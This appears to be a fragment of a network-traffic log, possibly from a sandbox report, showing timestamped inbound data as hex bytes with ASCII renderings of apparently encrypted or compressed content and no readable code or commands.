                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17385INData Raw: e9 8d 45 c1 59 6d 65 08 28 96 a3 54 f0 12 3b a2 67 74 83 39 8b 98 d6 5e 38 d1 1c 06 51 41 13 38 bd fd 5c fb 4e 6d 08 43 79 9e bd 75 37 b3 39 ee b2 bb 7d ff 8a 35 65 2e 90 fa e6 b0 13 b3 7f b9 da db 70 a0 71 aa f3 53 5d d2 28 e1 6c bf db 73 3d c4 14 d9 bd 7f db b6 13 88 e8 d9 00 8b df ec 00 c9 d4 e9 f1 24 3d 83 06 1f f5 85 0a 43 cc 7d 07 7a ba 7f 54 f0 4a e1 2c 22 87 07 84 eb d4 e8 b1 8a c1 b2 a1 3e 9b f8 05 70 91 f1 c1 a2 96 a7 fe 9b 91 d6 b1 54 f8 64 ee 5f 74 91 cb b2 68 d6 db c2 e8 18 d2 3b f4 f5 1c ca 54 cc 4e 4d 50 5b 2d 71 f0 42 be a1 aa 56 38 ec ca e8 b2 9a 9d 51 3d 08 4d a9 a6 15 c5 47 46 a2 82 37 ba 83 a2 0e e0 8f 7e 66 cd 97 f3 69 00 6b f4 0d 4c 5f b7 f2 e6 78 2d 5d 3c e8 f0 27 26 ac 73 a1 80 f7 48 93 53 6d 94 74 ea 3b 87 80 5e bc 91 c5 bc 1c d1
                                                                                                                                                                                                                                    Data Ascii: EYme(T;gt9^8QA8\NmCyu79}5e.pqS](ls=$=C}zTJ,">pTd_th;TNMP[-qBV8Q=MGF7~fikL_x-]<'&sHSmt;^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17401INData Raw: a5 aa a5 ab 4e 97 4d 18 51 76 8a cc 3d ec e6 d8 aa 92 96 fd f6 4a 81 88 d7 f5 b7 6c c3 f8 6f be 83 bc 9f 53 96 e6 3c c5 c1 d4 a2 f6 b0 b8 19 19 89 6f 64 ae 38 1e c6 3c b8 9f f1 db 19 43 9a 43 a9 57 c9 f3 8b a3 78 41 1b f9 2c ff 52 7f 3d b0 b0 2e 1b 6f 23 be 02 93 d0 ea 70 aa bf f9 5e 0c 73 b7 7c 33 a6 da 26 6d ff e5 0a 6f 8a f3 30 c1 8e 33 36 f3 05 c0 dc 75 ca 9d fd 52 f5 bd df 16 97 13 a9 37 ae bf 96 dd 5d 3f 92 80 c7 c3 5a 56 4a db fb 83 50 88 37 82 a8 90 73 21 c5 df 1a 4e bc 8c e4 d8 1a 07 67 73 d9 ec 9c fc ff d2 f7 a4 dc 41 ba df ef 7a a0 7c 65 fe a5 97 32 fb 35 c3 da 25 7a c9 af d2 5b 5d 0c 95 95 a1 a8 2e ab 17 25 7e 19 2d f1 6a 11 39 20 50 54 40 57 e8 a2 05 39 0d 28 00 14 6a 2b a1 9e e1 e9 82 18 b2 b9 d0 c4 bf 73 b4 f5 c8 1d b4 38 fe 53 da 0a 60 b7
                                                                                                                                                                                                                                    Data Ascii: NMQv=JloS<od8<CCWxA,R=.o#p^s|3&mo036uR7]?ZVJP7s!NgsAz|e25%z[].%~-j9 PT@W9(j+s8S`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17417INData Raw: d5 5e 6b 27 6b 93 74 c0 a7 8b 4f 53 e0 3e 6e 5f c7 0d ed d4 69 1b 5a 47 c6 58 50 ff f4 b9 de 9a 7a ee 14 6c 0f 04 12 69 29 89 7c ff c7 69 4c e3 ba 01 37 4e d0 95 80 66 b7 f0 19 04 fe 73 36 08 54 39 e3 bb 80 f5 ac e4 1d 44 56 d9 2a 66 86 45 94 19 ef 7e 45 74 4b 1b 75 8e fe 28 c7 eb 22 9d ca 55 c2 1f 2f 8d 04 7b fe 3e 98 fd 26 3a 3d b3 8c 9f 27 84 61 0a bf 37 cf e9 5a 00 a3 fb e8 b2 7c 1b 5f 2c d5 91 c6 3a d9 4b a7 69 4c 92 2b 32 c7 f4 5e b9 d7 09 75 f0 14 aa 05 97 8b 1a 23 35 08 24 14 b2 6a 6d ad dd d1 20 5f 40 2e 71 1f 2e b0 f3 98 ca 55 dc c1 28 f0 57 84 03 fe 67 fc ff 4b 6a 42 e2 30 f6 9a b3 cb 29 29 21 df 02 ca 6d e6 c9 f5 3a 86 f3 81 02 ac c8 5c d4 4e a4 68 27 df b9 4f c8 6b 80 27 a0 fe db 12 57 43 e1 84 25 a9 f6 1d 94 70 91 f3 09 71 6b dd 2c 59 50 31
                                                                                                                                                                                                                                    Data Ascii: ^k'ktOS>n_iZGXPzli)|iL7Nfs6T9DV*fE~EtKu("U/{>&:='a7Z|_,:KiL+2^u#5$jm _@.q.U(WgKjB0))!m:\Nh'Ok'WC%pqk,YP1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17433INData Raw: b1 47 56 27 27 6a 55 6f c5 92 3a 92 9b c5 ef d6 7b d8 5d 49 2f 52 bf de 8a 0a ee 53 9c c8 18 8a 97 bc 1c 62 fb 9d 54 c7 c9 a6 e4 ee 83 16 cc 96 3c 3e bd 40 94 25 a1 14 1d 0e 58 9f 4e 5b 1a 35 1a 9b ab bd 62 ce b3 a4 1f 0d 86 c2 91 10 6b 3b 72 bb cd ae 06 de 33 86 12 fa 3d bb 43 dc c6 7b b6 32 f9 e4 49 83 b3 af 26 cb e8 99 77 51 cd d4 3c f5 92 ae 14 de 89 c4 de 1a 8a 69 1f 0a 28 77 32 b6 8e e6 48 48 f5 bf 4f 1c 11 89 42 89 0c 87 bf f6 c0 db bc 81 4c f2 16 a0 a3 b6 0d 4c ef 47 a4 cd 16 34 4f df c1 59 f7 fe 88 7e 87 d2 a9 85 23 01 75 44 0c c4 af 96 8e ba fc 45 89 50 86 7a c4 45 b6 0c 43 46 72 5d fc fb 40 9a 82 9d 3b c3 21 41 44 c2 fe 9d de f8 8b bf c7 41 64 0e 5d 87 a7 c0 67 dd df 2f ec 93 37 4e 7b 0e ab db f6 1f 50 5e 2f d1 7f 56 25 3e 1d f7 19 c5 47 2c 4d
                                                                                                                                                                                                                                    Data Ascii: GV''jUo:{]I/RSbT<>@%XN[5bk;r3=C{2I&wQ<i(w2HHOBLLG4OY~#uDEPzECFr]@;!ADAd]g/7N{P^/V%>G,M
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17449INData Raw: 2c d6 51 ff 0b b0 bc 64 27 4f c0 68 b7 0e 6a 79 5d 6a 33 40 a2 0f e3 43 e8 86 c4 e1 24 50 29 12 3e c2 fb 7c 02 ca c5 39 77 82 f7 d5 c4 8b 55 5b 17 64 62 6a df 9c 9e 3c 20 fe ea 30 3b 74 f0 1b 46 08 5b 0b c8 29 63 83 5c 4c 78 0e ca fb af e0 2b 53 18 9b 9d ca 67 f6 05 1c 47 31 0c a0 ba 96 ac 92 2d 49 02 f3 1c 72 44 a3 08 4d a6 c9 a2 a1 d6 d5 f1 c5 f7 e0 37 42 da 73 e7 d6 87 b1 06 18 65 6e 97 7c c6 db 5e 22 49 d7 b8 00 48 b5 9d 50 60 d5 1d b8 87 bd 39 91 40 4d 1a 45 a8 8b 13 c6 cf 9f 6e cf 46 16 8e e7 ec 73 ae 6f f9 71 95 38 01 65 cc fd 8f d5 d1 3e b4 b1 39 fc 8c 04 0d c9 97 97 12 b2 ed 9b 20 69 04 92 04 ae 3f 20 b3 73 65 91 c8 52 cc 8a 02 b1 53 ca 1d a6 7b cf 96 4b 84 ed e7 1b 0e f3 60 66 c9 be d1 27 92 f2 3a f7 55 3a e5 17 4f e4 48 03 df 80 a9 b2 ca 82 26
                                                                                                                                                                                                                                    Data Ascii: ,Qd'Ohjy]j3@C$P)>|9wU[dbj< 0;tF[)c\Lx+SgG1-IrDM7Bsen|^"IHP`9@MEnFsoq8e>9 i? seRS{K`f':U:OH&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17465INData Raw: e9 d8 9f 7c e7 70 2c a9 0e 3f c2 ec 4f c7 d5 6f 98 98 3b d4 7c 0f be 4d 6d 91 d3 82 30 62 f7 d1 6b b4 98 eb ec a1 8b 20 3e 73 35 65 4a 8c 4e 52 73 39 9f 34 61 f8 76 19 5c 9a 1c ac 6c 96 47 1e a1 78 3b f9 e9 71 b1 e5 74 65 d6 a9 70 a6 6d b2 17 b7 e7 98 a9 e2 b8 52 fc e4 87 1f 09 8c 63 5e 4b 0f fb 7e 3b 1e 48 52 cd d3 59 61 2f 64 3a e7 38 87 29 3c e0 18 aa 2c 53 5e f3 35 42 ba 6d f0 a1 cb 79 17 c9 b0 65 c1 43 34 ad 98 b1 7b 13 21 f3 d1 e1 6c f4 5f dc 9c 01 37 71 fa 7a 3d 78 b9 2d 0d 2f c7 42 49 24 15 57 96 eb 56 a2 99 50 6e b3 09 68 01 4e 2f 58 9e b5 8a 38 02 40 f4 57 0d 66 99 ee cf 65 35 ed 0e ba ee 5b 3e c8 af 37 bc 0c 50 86 55 fe 29 cd 51 ef 7a fa 80 64 f7 a3 a4 9a 08 d5 b4 0c a1 7f b6 b6 24 66 8a b5 9a ab 84 e3 79 49 89 f0 14 4f 94 7a 6e b1 51 0e 34 3c
                                                                                                                                                                                                                                    Data Ascii: |p,?Oo;|Mm0bk >s5eJNRs94av\lGx;qtepmRc^K~;HRYa/d:8)<,S^5BmyeC4{!l_7qz=x-/BI$WVPnhN/X8@Wfe5[>7PU)Qzd$fyIOznQ4<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17481INData Raw: 0e da ff a7 67 a5 de 60 12 6e 83 14 2e 2f 50 85 c4 93 b4 ad 59 86 0a 3b f4 f3 26 4e 79 3b 06 c2 fc 16 ae 3c 50 bd 52 12 2b dd a7 4c 1f bd 57 29 b9 1d 1a 67 5f c1 b3 65 f6 b3 62 60 71 24 02 46 c6 85 23 39 53 9b 04 8a 84 3b 22 42 63 84 91 4a 04 a5 fa af 0f b7 b1 60 65 a7 ff 05 53 9b 83 96 6b 5f e8 fd bb 18 2c dd fb e8 80 28 ed 08 fe 68 c0 70 75 1c e4 43 23 ce ed 3f 4b 24 29 da f1 1f 80 c3 b7 85 b7 27 27 1c fc 1e 9d 8c 88 bc 53 df 39 5b 83 60 76 cb 15 4b 1d 2f 95 f0 70 bd 9a 6b dc d6 d5 56 58 03 a4 a1 a1 44 3c 8d 37 3c 1c db d4 cf 82 84 8b b8 a7 7a b2 15 6c c4 c4 6d 9e d0 54 ff b7 32 18 ef 34 21 06 74 fd 34 0a 77 37 bf ad 4a 03 78 71 ba 69 24 ae a4 94 5e bf 5e 17 05 ad 5a 61 72 20 d0 63 6e db 71 6f b8 5b c8 60 7b b9 69 60 78 29 60 74 e2 fe 0b ec 49 dd 97 9f
                                                                                                                                                                                                                                    Data Ascii: g`n./PY;&Ny;<PR+LW)g_eb`q$F#9S;"BcJ`eSk_,(hpuC#?K$)''S9[`vK/pkVXD<7<zlmT24!t4w7Jxqi$^^Zar cnqo[`{i`x)`tI
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17497INData Raw: 0a 89 62 31 b5 8b ce 0e de 97 b9 85 06 58 31 6e c3 34 00 15 18 57 16 b4 02 13 e3 6b 35 ba ab fc 6d ee e9 2c 11 13 3d 52 22 22 11 a3 58 38 17 9f 7b d2 08 ab 6b 11 86 6c 24 8c 25 06 9c e0 be 43 8f 28 4c 76 58 26 f8 9f 53 de 21 2a 0c 53 8e 43 30 64 85 9f c5 bf 72 e8 85 dd bd 4b af 66 ac 9a 54 7e 60 92 3f 08 10 66 51 fc 4d 63 d9 7f 9a 06 c9 18 42 c1 9d ef 83 14 52 a1 eb 8e 47 c4 1c 88 c3 53 ef 98 a4 8e de 82 75 17 56 71 03 49 6a df 4d 1e 3f 5d af bf a7 70 17 b5 eb 70 d8 ec 09 13 d6 5c f8 30 fa 33 7c f3 23 cd 34 8b 10 8c 2d 6b 48 81 ba 81 c2 4f 28 1a 1a ea b6 81 d0 83 93 a2 9a 04 2a 8d 92 89 f9 d5 a8 b9 55 25 00 44 f4 fd 50 0a 7b dd fa 31 57 a2 71 3e 31 57 64 bc 86 25 f1 83 f2 79 b2 e5 47 57 96 79 49 a3 cd 39 77 4e af e2 d7 c0 f5 ed 57 d3 25 b8 a7 22 e8 7d 3b
                                                                                                                                                                                                                                    Data Ascii: b1X1n4Wk5m,=R""X8{kl$%C(LvX&S!*SC0drKfT~`?fQMcBRGSuVqIjM?]pp\03|#4-kHO(*U%DP{1Wq>1Wd%yGWyI9wNW%"};
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17513INData Raw: 49 5a c0 c3 2f 03 c4 f4 7c 85 d1 26 f7 45 8f 87 98 a2 9a fc 75 67 34 36 b4 87 f5 58 c1 70 5b 8d 1f 7b cc a6 d0 c0 e5 d0 75 a3 e3 78 bc 2c f2 67 c6 fa e2 42 0e 35 6f 31 88 04 ee c7 10 fb 13 3c 28 65 b8 ee b6 7a 6d 15 86 b4 94 05 5d b1 ff 90 cc 20 8f 36 36 53 93 60 61 99 0e 69 66 9a 49 80 48 78 03 6f 8f d8 2e 32 9b c4 92 3d 4f 1a 3a 02 d2 ac e6 d0 5f d4 86 ae d0 02 c1 d5 51 9c a4 99 f3 4f b4 a2 11 03 ff 98 36 ab b9 88 3e e4 0a 4b b0 cc 2f 9d b5 5f 31 cd da a6 8f 32 20 a8 68 2b b4 ca 3a 52 12 fb fa 12 58 d6 81 f6 64 7c 3c c5 ef 7a 38 4b 0e d8 1f a4 76 14 4a da 74 e0 47 27 31 d5 30 13 49 19 a8 53 c0 b9 f9 3c 3d 26 15 4a 09 91 43 ed 1f 84 fd 5e 8f 60 3d d2 e9 fd 9f f5 c9 d0 e1 91 23 ad 1e 02 d2 ca c7 11 af 5b bd c7 52 2c 1a 59 4d ef a5 50 15 12 55 81 49 d7 bc
                                                                                                                                                                                                                                    Data Ascii: IZ/|&Eug46Xp[{ux,gB5o1<(ezm] 66S`aifIHxo.2=O:_QO6>K/_12 h+:RXd|<z8KvJtG'10IS<=&JC^`=#[R,YMPUI
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17529INData Raw: ad 19 fc db a8 94 af aa dd 88 08 fa 2f 4e 1a 47 00 49 39 ca 66 cf df 72 ea e1 2d f0 c4 98 0c d3 1c 45 66 b1 3a cc a3 3f 8b 5d 43 1f 2d 2f c1 45 fb 52 d6 b0 c7 f1 80 dc af f3 0f 93 8f 06 bf c8 af f5 b6 c1 67 c1 c4 69 8f d2 b7 37 ae ba cc 03 9c 08 dc 62 35 7f 05 77 ff a1 ac e1 34 4f 6f b1 d4 14 80 04 bf 6d 68 88 be 5e 91 4f 69 4d 79 24 2d d9 46 17 9e 00 e8 4c 0d 2d 92 a3 ca de a7 b6 11 3d d8 8a 17 ba e2 47 d5 e4 aa 5e e7 da 28 c1 f0 8d 6b 7b cb 18 9f 76 0f 94 3f 2f b3 58 75 80 c6 fb b2 6c ce 04 c0 30 3d d4 06 be a1 f7 c0 40 65 09 5d 2f 62 50 3a 07 1c 72 62 ff 83 69 76 ee 46 73 3b ed cf 3f cf e1 8b 98 6e dc de a9 1e c0 18 f2 59 9e 56 27 06 14 e7 ef 25 16 95 80 26 8d df 51 ac dc 0d 1e 53 64 69 85 c8 4e 5b da 2f be 7d 4c 32 78 25 01 54 83 e6 85 7a bd 2b 07 61
                                                                                                                                                                                                                                    Data Ascii: /NGI9fr-Ef:?]C-/ERgi7b5w4Oomh^OiMy$-FL-=G^(k{v?/Xul0=@e]/bP:rbivFs;?nYV'%&QSdiN[/}L2x%Tz+a
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17545INData Raw: 7f 10 d5 51 70 e4 32 10 1c 59 31 43 17 68 42 fd db 19 f1 a4 6b ec 71 94 ab c5 f2 f2 4f 4b 09 4e 86 8a de 3e 02 3a cd be 32 92 bd a2 29 b5 19 25 db f3 67 4b 90 a5 cf b3 e4 e5 07 41 da f5 eb 39 a1 f3 0e 73 ad a5 4d 55 24 88 e0 99 67 1e 3e 6d b8 57 3b 3f 75 2d c8 dd ea 32 c7 b6 fe 02 63 f3 21 1e 7f c3 a3 ac a7 93 eb 06 af d6 fd 18 72 85 a3 2d c9 d8 5f fe 4c 6a 71 e4 cf 13 ba e4 e8 83 23 a4 8e 0c bb 45 2c d4 e6 32 52 c9 0d af 94 4c 1a 04 a6 b1 e2 3f 93 ae c9 26 bc f5 ec e9 d4 3b 5c 9d ea 69 46 ff 33 f0 18 e0 5c dd 39 b1 0d c7 c3 dc b0 c1 2c 17 3e 24 2a 68 5f 8a 96 8d 4d d8 38 c4 96 3d a0 1d d9 58 c4 a3 2d 56 ea 4e 95 8d bc 22 05 5b 63 cc 24 1a 9d 82 eb 32 ca 93 75 49 71 2a 1f bc 6a 93 20 33 92 46 89 cd 68 e7 85 f8 f7 ee be cc b5 65 57 f1 f4 fd a7 5b 5a e9 e8
                                                                                                                                                                                                                                    Data Ascii: Qp2Y1ChBkqOKN>:2)%gKA9sMU$g>mW;?u-2c!r-_Ljq#E,2RL?&;\iF3\9,>$*h_M8=X-VN"[c$2uIq*j 3FheW[Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17560INData Raw: 99 2f 6d 48 16 79 0f b7 dd 6c 78 0c 23 71 43 b9 a1 af f2 4a 6f 89 b5 59 56 d1 82 e1 81 25 66 5b 99 0e dd 71 ac fe 71 d4 61 43 90 ac 91 3c c3 b2 22 cc 32 f3 84 c5 37 ea a4 1b 62 11 70 95 1b ed 78 e3 38 42 01 41 fa 09 f3 67 7f 54 52 b4 b8 db cb 7f fd 2a b6 ab 85 2a 08 ac 3c 5a 8e 2f 41 5c d2 a3 e2 e0 3b 9a 2d 92 ff 05 9e 41 07 a3 62 01 09 e3 96 41 7d eb 23 e0 9e ac 0c 02 eb 16 56 0f 7d da 98 aa e5 e0 f2 e9 d3 cf 77 c0 fd ba 53 09 f1 cd 02 ca 49 9e 4b 5e 15 8f 6c 5d 7d 96 33 9e d0 61 fd 9d ca 34 9f 2e 04 95 c3 40 4b 15 41 b3 e0 b8 da 7b 61 f9 0c 4c b5 cd 93 7b 4b b7 4a 34 8c 04 a4 3d 16 0c 22 c5 90 46 2d 47 14 c9 a3 b0 cd 2f 0d 19 f7 09 08 c4 42 57 c3 e8 f2 e4 10 ed 8e ee 1d 74 8c bb 1c 77 5e 3f 43 b9 ea 0d 1e 65 75 51 72 90 a9 d3 6e 48 eb a9 85 7c 16 55 2c
                                                                                                                                                                                                                                    Data Ascii: /mHylx#qCJoYV%f[qqaC<"27bpx8BAgTR**<Z/A\;-AbA}#V}wSIK^l]}3a4.@KA{aL{KJ4="F-G/BWtw^?CeuQrnH|U,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17576INData Raw: 63 45 d4 51 45 84 f8 57 57 84 f7 ae 42 fd 03 df 0b 56 e5 5a ed 95 2c 14 1a 24 3c e5 7f 14 bf 05 4e a4 42 ef 47 fb 6f 37 b0 86 71 91 3c f2 f8 73 82 92 ca 4d b0 85 0c 9f 8b 61 28 61 a4 80 38 39 a3 5c 8f d7 ab dc 9f 0d 60 18 8c 0e 38 a0 ce 2c d2 7d f2 99 aa 65 11 a7 e8 3a 7a 9f 5c 03 b7 c8 be ce 28 8d de fd 80 91 32 0b d2 5b 45 6f 81 9a e5 c4 39 72 f0 59 eb 4a 83 e8 27 c9 13 b0 e7 4c b9 2c 41 f9 0c bb 5b 97 c0 10 a9 eb 88 fb 0c 05 da f0 ec 11 f5 56 53 2e 81 68 90 b2 61 29 92 62 be ea d7 e0 27 95 ad 99 f5 41 9e 52 ee 2c d4 8d 00 4d 5e 18 38 c5 71 2d 8d 8f c3 e2 b6 25 05 70 c1 00 d5 74 02 04 e2 ea da 6a 64 db 35 8e cb 4c 06 93 fd 26 de 9a ce 3e 80 4d d3 2f f5 b3 29 27 5a 47 ca 9a 09 0c 8b b6 4d 5a b7 10 b4 22 6c 70 1b 0c 3d 1a ab c6 dc 6c 53 46 67 4c 2e 5d d7
                                                                                                                                                                                                                                    Data Ascii: cEQEWWBVZ,$<NBGo7q<sMa(a89\`8,}e:z\(2[Eo9rYJ'L,A[VS.ha)b'AR,M^8q-%ptjd5L&>M/)'ZGMZ"lp=lSFgL.]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17592INData Raw: 31 f0 a8 43 9b 3e 3b 6b b7 8b 34 1a 5e 0b cb 20 a5 b2 e6 49 6e 09 d2 c3 67 17 73 84 ea 07 ed f6 65 74 5f 58 44 97 52 d8 15 41 ca 32 22 93 67 94 b8 9a 67 07 40 6b 1d fc 83 fb 39 6c 36 90 3c 4f a0 22 5f a0 a4 8c fa 9d 47 6f 41 a5 bd a0 be 23 ca 5a ac 74 86 1c 56 27 99 bc c3 19 a8 50 26 d7 a1 ed be d8 d0 0e f6 0c a9 a6 cc 90 08 2d 6d f5 e4 c2 d3 46 b6 87 04 f4 ea d5 3d 7f c9 4b bf 6d 3f d4 b2 3e 30 6d d9 74 51 18 6c b8 52 4b 02 a3 16 dc 29 77 5d 7f 14 2e 90 74 4f 41 69 58 a6 c2 58 3c 1e c7 c1 f6 f8 b4 95 0d 3f 0d f8 5c 2e d1 15 88 d4 62 41 4a 91 ca 62 20 c2 f0 22 01 d4 01 c7 52 7f 3f 7b 58 85 1a fa 17 3d 66 31 97 ca 32 93 af 17 76 32 ef a0 dc 21 5e f9 07 e7 9a f7 b0 c3 43 c8 da 92 fc ad 5e 23 50 a7 7f cc 8d c5 e1 96 a0 29 8d 1c d7 11 c3 b1 ae ae 8a ff ea a2
                                                                                                                                                                                                                                    Data Ascii: 1C>;k4^ Ingset_XDRA2"gg@k9l6<O"_GoA#ZtV'P&-mF=Km?>0mtQlRK)w].tOAiXX<?\.bAJb "R?{X=f12v2!^C^#P)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17608INData Raw: 0f 9f e5 72 fb 2d 90 c7 d1 d1 6c 31 a8 d4 3d d1 32 6a 04 70 c5 ae 1b 68 dd 2d 9b 92 c8 12 01 cd f7 86 dd 89 de f6 0f ed 89 09 69 ee f3 77 32 01 bb c0 5d 1d a6 f2 e8 01 c9 66 e5 51 03 02 6f ca bd c7 16 bc d2 2b 2f 3c 4b f0 f8 28 8c 15 01 0f a8 a8 b2 82 e6 45 75 6b 3b c1 b1 5c 04 64 a9 8e 70 56 1d 84 5e 94 a8 f3 d5 d3 02 00 e8 de e4 e0 39 5f fa 3f a8 b0 2e 1e 59 c9 24 75 ea 20 7f b2 0b 9a d0 38 be a2 43 e1 14 c8 45 6e 20 8f d3 e5 a1 2a 38 79 f0 c5 3e 32 0c bb 0a ff 9b 9d 15 a0 b0 53 6e 81 d7 37 0b 37 2a 72 6a 88 44 50 00 28 7d 42 bc 7e 74 36 2b bf f6 c4 8d 40 7a b9 70 da f6 d9 d5 e2 aa 69 2b d9 c7 92 39 1b 62 6f 40 f5 4f 60 2a 44 d3 0d db 47 f9 6e de 63 cd 1d ad 47 14 71 f3 8d 52 7a 9a b9 47 7c a8 32 07 0c 8b e1 e1 c3 c1 ff 0f e8 3a 03 21 bf 93 2a c6 05 2e
                                                                                                                                                                                                                                    Data Ascii: r-l1=2jph-iw2]fQo+/<K(Euk;\dpV^9_?.Y$u 8CEn *8y>2Sn77*rjDP(}B~t6+@zpi+9bo@O`*DGncGqRzG|2:!*.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17624INData Raw: e6 9b 8f 26 82 3f 77 e6 af e5 4a f0 20 3f 99 85 d2 17 18 6d 2e ab af 6a 71 66 5b dd 4d 7f 5c 31 1b 67 e5 59 c2 e1 e3 e3 63 d8 67 b7 b7 81 58 e5 53 05 89 fa b5 1d a1 88 84 55 78 cf e6 10 08 bb 02 9d 23 6d 22 0c c3 d0 e8 14 d1 26 d1 8d cc ac 15 8f bb 16 f9 00 fa fc 34 45 e9 d4 f4 81 d5 25 18 21 d2 eb 7e 4b ff 82 22 95 95 ae 6a 6c 3c 84 b5 5b 0c 27 ca f0 17 8e 71 78 3b a5 79 72 4f d0 24 bc ee 37 92 cf 38 96 36 7a 65 3c f6 73 60 e3 ae 6b 6c 92 c6 c3 cf 32 f9 a7 68 d6 20 48 21 6f 59 30 29 6e c3 f1 cb e8 cb aa 85 dc f0 21 9a b3 e4 80 57 df 8c 3e ee 0b b0 ea e1 9a 27 b9 05 81 73 ba c0 cb 0d e7 fd 8c 2c c1 40 2d 38 22 d5 3e df ca 9f 9b f7 b2 cc 70 c8 ba 40 e8 ab 0a 88 02 53 16 3f 9b 87 f8 f6 32 3d 7d 8a 8e 9f bc 57 3a 9b 8b ea db 38 97 c9 17 7b d5 5b 5c 7a 92 36
                                                                                                                                                                                                                                    Data Ascii: &?wJ ?m.jqf[M\1gYcgXSUx#m"&4E%!~K"jl<['qx;yrO$786ze<s`kl2h H!oY0)n!W>'s,@-8">p@S?2=}W:8{[\z6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17640INData Raw: df 7a fb 75 7d d1 a8 6c d7 17 47 5a 18 7a 56 c9 0f d7 f9 93 8c 5f 2d 4c 7d fe 91 8f 64 39 53 12 52 97 7c 83 92 c0 f8 af ea 30 f6 19 2d ec 0b 82 c6 18 9d dd c8 0b 1c 2a 1a 84 f8 37 1b d0 d0 4e 82 1b dd 2a 81 8d 9a 8b 78 d5 18 a4 92 09 66 a0 5a a1 7a 55 3b 83 b4 a2 85 24 37 09 4f 30 c4 33 6a af ce d1 98 f5 5d 97 06 1f e0 70 c2 b6 f3 66 82 f8 90 d6 ee 5c f4 fa bb eb fa e1 9e 2a db d6 a1 31 a9 8c df ae 5a 17 c8 40 36 e9 61 e1 e8 3f 52 f5 d7 d5 c8 13 fb ad 7d 68 e5 bd b3 0a c9 5e bd 5e da 70 01 9a f7 77 08 ef 5c 83 56 ed dc e9 12 77 ee 11 71 ea 4a a9 34 a4 eb ca 4a 39 98 a9 2c 41 92 38 a5 c8 07 e9 75 47 4b d2 04 a3 24 7a 88 f6 7a 4d 89 a3 ef ab 9d 35 d8 ec 1a 15 71 ab 43 f3 a4 1e ea bf ed 5a 29 05 fd a4 f7 54 27 e4 f7 ba fc 03 a0 af 06 39 0f f1 ba 8d 87 92 96
                                                                                                                                                                                                                                    Data Ascii: zu}lGZzV_-L}d9SR|0-*7N*xfZzU;$7O03j]pf\*1Z@6a?R}h^^pw\VwqJ4J9,A8uGK$zzM5qCZ)T'9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17656INData Raw: e1 43 fa 1f 3b 08 b5 27 4f 1d d4 33 7d b7 f4 69 cd e7 9e 74 37 49 31 13 1d 83 8b 8e 51 f0 af 4f 36 e2 06 11 27 c7 a7 52 40 2a 61 b1 a7 41 fb 59 d5 4d a2 cd b7 75 f5 aa 91 14 84 12 9f e7 27 cf ef 3c 8b d5 29 8e d8 f1 6a 31 2e e1 f3 59 e7 4d e2 f9 8a ac 61 a5 12 28 8a 4b d9 ab c5 d2 8f 6e 0f 2e cc 7d 04 27 88 7d 3c b1 09 56 6a 48 07 af 40 7c fd d6 b4 c4 08 a6 19 03 84 3f d8 df 30 57 cb 2c 32 48 23 26 55 b2 b0 bd 42 51 f9 f3 df 16 e5 a5 56 28 10 10 90 c1 04 25 8d d8 9a a0 fe b7 0f dd 50 da 64 5e 2d 80 53 ac 18 46 6b 73 ea b6 e6 c0 b9 d9 98 56 b2 e1 89 96 48 0f 3e a1 93 71 a3 97 76 d1 fe 24 31 c4 2b 92 c4 f1 9d 8c fc 7c 93 e5 94 a6 67 45 2c 47 57 7c 56 9d 2e 32 28 a7 86 08 4e a6 9e e3 9e 8e f0 e2 a0 49 21 e4 9f 31 63 b7 5b 8b 01 50 08 27 c3 09 86 30 29 b1 24
                                                                                                                                                                                                                                    Data Ascii: C;'O3}it7I1QO6'R@*aAYMu'<)j1.YMa(Kn.}'}<VjH@|?0W,2H#&UBQV(%Pd^-SFksVH>qv$1+|gE,GW|V.2(NI!1c[P'0)$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17672INData Raw: 15 70 89 b6 73 c9 ad 82 04 07 1a 42 67 a4 cf a4 f9 67 46 5f 88 71 06 e8 a7 a6 05 9d 6f 0f b7 8f 12 cd 06 63 5c f4 80 b9 fc 24 1a b0 e8 17 8b e9 e7 a5 25 af 68 22 87 6f 3a 8d b7 3a a1 1e 3c 1d 22 5b dc 9a e8 6f dd 08 3b 07 38 2d 52 7b 60 2c a1 74 11 4d 78 42 f1 bb 5f 4f 4a a2 bc ed 3e a1 91 18 10 0b f2 01 18 2a 04 9e d9 66 72 80 ba 62 3a c2 41 b8 c4 3a 78 f5 5c 24 f4 60 ca c2 31 c4 2b 7c ec 7d 81 e3 a3 9b b4 0f 50 3e c2 4c 83 d0 72 f6 c7 af 7b a5 f7 bb 0b 79 2b f2 0a 69 c0 18 32 90 63 0e 86 7d 86 b7 49 12 42 91 a0 d9 11 07 b8 7f 0f 75 3b d4 34 61 d1 46 d5 da 07 75 2a 1d 23 bf d5 ca b6 8c ff 96 db 61 6f e1 2c 4f 1a 3b 1d 27 66 44 b0 57 55 e6 63 a7 03 a5 49 3a a1 ed be 65 5d dd 9a 02 ac 55 8d 73 3f 0c 22 c6 3c e3 7d ff 73 8c e2 29 81 2e c9 43 31 ee 5d fe 1b
                                                                                                                                                                                                                                    Data Ascii: psBggF_qoc\$%h"o::<"[o;8-R{`,tMxB_OJ>*frb:A:x\$`1+|}P>Lr{y+i2c}IBu;4aFu*#ao,O;'fDWUcI:e]Us?"<}s).C1]
